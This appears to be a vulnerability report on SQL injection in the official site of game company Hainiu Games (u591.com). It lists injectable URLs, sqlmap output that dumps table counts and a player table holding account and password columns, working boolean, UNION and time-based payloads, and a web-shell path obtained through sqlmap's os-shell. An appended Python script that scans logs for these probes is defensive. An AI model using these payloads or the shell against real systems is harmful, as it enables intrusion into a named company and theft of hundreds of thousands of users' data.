Hainiu Games official site http://www.u591.com/ ; every subdirectory under it is one of the company's own games.

【First, SQL injection】
Same as the generic case; a few examples:
http://www.u591.com/sw/news.php?id=1634
http://www.u591.com/lw/news_list.php?TypeID=41
http://www.u591.com/tw/news_list.php?ntype=6
http://www.u591.com/newpay/index.php?game_id=2

【sqlmap screenshot】:
【| u_player1 | 476085 is the user database】 As you can see, that is roughly 500k users; across all the games combined, at least several million users.

Database info:
Database: u591
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| u_code_exchange     | 3918025 |
| pay_log             | 923359  |
| u_emoney1           | 889739  |
| u_player1           | 476085  |
| cpa                 | 330352  |
| u_delplayer1        | 241678  |
| u_delplayer13       | 234778  |
| u_delplayer8        | 204292  |
| u_delplayer16       | 102360  |
| account             | 70736   |
| emoney1             | 65844   |
| u_emoney5           | 43306   |
| u_delplayer302      | 31632   |
| u_delplayer18       | 31613   |
| pay_sms             | 23660   |
| u_emoney4           | 20247   |
| u_emoney2           | 17496   |
| u_emoney3           | 16719   |
| fenbaouser          | 15749   |
| u_itemtype          | 13137   |
| u_delplayer305      | 12886   |
| u_delplayer301      | 11044   |
| code_account        | 11000   |
| u_delplayer19       | 8097    |
| lw_u_player1        | 6027    |
| code_log            | 4114    |
| u_code_exchange_bak | 4056    |
| account_limit_log   | 3640    |
| u_delplayer306      | 3376    |
| lw_u_delplayer1     | 3083    |
| news_data           | 1545    |
| add_good            | 887     |
| u_charts_player     | 709     |
| u_card              | 532     |
| lw_add_good         | 244     |
| kf_message          | 236     |
| key_value           | 113     |
| pay_91              | 109     |
| kf_reply            | 95      |
| news_class          | 70      |
| client_data         | 67      |
| account_ip_error    | 56      |
| lw_u_vipgoods       | 49      |
| change_pay_log      | 33      |
| down_class          | 24      |
| user_fenbao         | 17      |
| link_data           | 14      |
| admin_user          | 8       |
| online_4399         | 6       |
| client_ver          | 4       |
| idfa_app            | 3       |
| publicity           | 3       |
| artificial_vip      | 2       |
| bug_message         | 2       |
| sent_message        | 2       |
| u_code_businesses   | 2       |
| app_sent            | 1       |
+---------------------+---------+
Database: u591
Table: u_player1
[93 columns]
+-------------------+-------------------------------+
| Column            | Type                          |
+-------------------+-------------------------------+
| level             | tinyint(1) unsigned           |
| position          | tinyint(3) unsigned           |
| account           | varchar(7)                    |
| account_id        | int(4) unsigned               |
| additional_point  | smallint(2) unsigned          |
| attr              | int(4) unsigned zerofill      |
| auto_exercise     | tinyint(4) unsigned zerofill  |
| auto_point        | tinyint(1) unsigned           |
| bfcrystal1        | int(4) unsigned               |
| bfcrystal2        | int(4) unsigned               |
| bfcrystal3        | int(4) unsigned               |
| big_badluck       | tinyint(1) unsigned           |
| card_id           | int(4) unsigned               |
| chk_sum           | int(4) unsigned               |
| clan_proffer      | int(4) unsigned               |
| coin_money        | int(4) unsigned               |
| crystal_usage     | int(4) unsigned               |
| current_life_max  | int(4) unsigned               |
| dark_rate         | tinyint(1)                    |
| data_num          | tinyint(1) unsigned zerofill  |
| Defense_point     | smallint(2) unsigned          |
| dexiterity        | smallint(2) unsigned          |
| dodge             | smallint(2) unsigned          |
| earth_element     | smallint(2) unsigned zerofill |
| emoney            | int(4) unsigned               |
| eud_bag_size      | tinyint(1) unsigned           |
| eud_storage_limit | tinyint(1) unsigned           |
| exp               | int(4) unsigned               |
| exp_ball_usage    | smallint(2) unsigned          |
| ext_package_size  | tinyint(1) unsigned           |
| extra_point       | int(4) unsigned               |
| fire_element      | smallint(2) unsigned zerofill |
| fire_rate         | tinyint(1)                    |
| flower            | int(4) unsigned               |
| geomancy          | int(4) unsigned               |
| god_status        | int(4) unsigned               |
| godexp            | int(4) unsigned zerofill      |
| gold_element      | smallint(2) unsigned zerofill |
| governproffer     | smallint(2) unsigned          |
| grid_amount       | smallint(2) unsigned          |
| grid_lev          | smallint(2) unsigned          |
| hair              | smallint(2) unsigned          |
| health            | smallint(2) unsigned          |
| holy_rate         | tinyint(1)                    |
| horse_bag_size    | tinyint(1) unsigned           |
| ice_rate          | tinyint(1)                    |
| id                | int(4) unsigned               |
| impart_num        | int(4) unsigned               |
| intellect_point   | smallint(2) unsigned          |
| last_login        | int(8) unsigned               |
| last_logout       | int(4) unsigned zerofill      |
| life              | int(4) unsigned               |
| Life_point        | smallint(2) unsigned          |
| lock_key          | int(10) unsigned              |
| lookface          | int(4) unsigned               |
| magic_atk         | int(4) unsigned               |
| mana              | smallint(2) unsigned          |
| marry_id          | int(4) unsigned zerofill      |
| money             | int(4) unsigned               |
| money_saved       | int(4) unsigned               |
| mora              | int(4) unsigned zerofill      |
| name              | varchar(7)                    |
| num_kill_small    | int(4) unsigned               |
| old_prof          | smallint(2) unsigned          |
| online_time       | tinyint(4) unsigned zerofill  |
| password          | varchar(7)                    |
| pk                | int(4)                        |
| popularity        | int(4) unsigned               |
| profession        | tinyint(2) unsigned           |
| reborn_times      | tinyint(1) unsigned           |
| recordmap_id      | int(4) unsigned               |
| recordx           | smallint(2) unsigned          |
| recordy           | smallint(2) unsigned          |
| reserve_money     | int(4) unsigned               |
| small_badluck     | tinyint(1) unsigned           |
| soul              | smallint(2) unsigned          |
| sp                | smallint(2) unsigned          |
| Speed_point       | smallint(2) unsigned          |
| stamina           | smallint(2) unsigned          |
| storage_lev       | tinyint(1) unsigned zerofill  |
| strength          | smallint(2) unsigned          |
| strength_point    | smallint(2) unsigned          |
| student_finished  | int(4) unsigned               |
| syndicate_id      | int(4) unsigned               |
| task_mask         | int(4) unsigned zerofill      |
| thunder_rate      | tinyint(1)                    |
| title             | int(4) unsigned               |
| vigor             | smallint(2) unsigned          |
| vitality          | smallint(2) unsigned          |
| water_element     | smallint(2) unsigned zerofill |
| wind_rate         | tinyint(1)                    |
| wood_element      | smallint(2) unsigned zerofill |
| workload          | smallint(2) unsigned          |
+-------------------+-------------------------------+
【Now for GETSHELL】
Because the database account has DBA privileges:

The website root directory is revealed by the error message the SQL injection triggers:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in E:\wamp\www\www\inc\function.php on line 208
With the root path known, sqlmap's --os-shell gets a shell directly.

SHELL address: http://www.u591.com:80/inc/tmpulkll.php
Since the injection is generic, the getshell is generic as well; and because all the games sit in second-level directories, this yields a shell on the main official site directly.

Full sqlmap run:
[11:58:51] [INFO] testing connection to the target URL
[11:58:52] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:58:53] [INFO] target URL is stable
[11:58:53] [INFO] testing if GET parameter 'id' is dynamic
[11:58:53] [INFO] confirming that GET parameter 'id' is dynamic
[11:58:53] [INFO] GET parameter 'id' is dynamic
[11:58:53] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:58:54] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:58:57] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:58:58] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:58:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:58:58] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:58:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:58:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:58:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[11:58:59] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:59:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[11:59:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:59:00] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:59:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:59:01] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:59:01] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:59:01] [INFO] testing 'MySQL inline queries'
[11:59:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:59:01] [WARNING] time-based comparison requires larger statistical model, please wait...
[11:59:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:59:02] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:59:13] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[11:59:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:59:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:59:13] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:59:14] [INFO] target URL appears to have 7 columns in query
[11:59:15] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1634 AND 1530=1530

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=1634 UNION ALL SELECT NULL,NULL,CONCAT(0x716b7a6271,0x704f4a50564871726d50,0x7178787071),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1634 AND SLEEP(5)
---
[11:59:39] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.8
back-end DBMS: MySQL 5.0.11
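As an added detection-side example (not part of the original report), the following Python script scans web-server access logs for the three probe families the sqlmap run above settled on (boolean-based "AND n=n", "UNION ALL SELECT NULL,...", and "AND SLEEP(n)") plus sqlmap's default User-Agent, so an operator can spot a run like this one in the Apache logs. It assumes Apache "combined" log format; the log lines are constructed, not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache "combined" log lines (not real traffic); the probe values
# mirror the three payload families sqlmap reported against news.php?id=.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2016:11:58:57 +0800] "GET /sw/news.php?id=1634%20AND%201530%3D1530 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [01/Jan/2016:11:59:02 +0800] "GET /sw/news.php?id=1634%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev"
203.0.113.5 - - [01/Jan/2016:11:59:15 +0800] "GET /sw/news.php?id=1634%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x716b7a6271%2C0x7178787071%29%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2016:12:00:00 +0800] "GET /sw/news.php?id=1634 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [ts] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Technique name -> pattern applied to the percent-decoded parameter value.
RULES = [
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("time-based blind", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
]

def classify_value(value):
    """Names of the injection techniques whose pattern matches one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]

def scan_log(text):
    """Return (ip, path, parameter, technique) tuples for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so '%20AND%201530%3D1530' becomes ' AND 1530=1530'
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            for technique in classify_value(value):
                hits.append((m.group("ip"), url.path, key, technique))
        if m.group("ua").lower().startswith("sqlmap"):
            hits.append((m.group("ip"), url.path, "-", "sqlmap user-agent"))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("%s %s param=%s -> %s" % hit)
```

The same rules apply to the other listed entry points (TypeID, ntype, game_id) because every query parameter is decoded and checked, not only id.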